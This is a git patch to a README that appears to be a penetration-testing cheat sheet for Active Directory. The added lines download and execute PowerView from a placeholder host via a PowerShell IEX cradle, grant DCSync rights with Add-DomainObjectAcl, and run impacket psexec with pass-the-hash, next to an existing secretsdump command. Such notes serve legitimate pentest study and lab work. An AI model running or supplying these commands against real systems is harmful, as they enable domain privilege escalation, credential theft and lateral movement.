From 19745ea06b00f4f489e3c23f34b3484144ac8d8c Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Mon, 5 Sep 2022 15:26:44 -0400
Subject: [PATCH] Update README.md

---
 README.md | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/README.md b/README.md
index f0abf47..c02dcdf 100644
--- a/README.md
+++ b/README.md
@@ -618,9 +618,16 @@ sudo ./usr/bin/neo4j console # LHOST
 ./BloodHound --no-sandbox
+IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1")
+$pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force
+$cred = New-Object System.Management.Automation.PSCredential('{DOMAIN}\{USERNAME}', $pass)
+Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC={DOMAIN1},DC={DOMAIN2}" -PrincipalIdentity {USERNAME} -Rights DCSync
+
 # Dump secrets
 sudo python3 ./usr/share/doc/python3-impacket/examples/secretsdump.py '{DOMAIN}/{USERNAME}':'{PASSWORD}'@{IP ADDRESS}
+# PSEXEC
+sudo python3 psexec.py -hashes {HASH1:HASH2} {USERNAME}@{IP ADDRESS}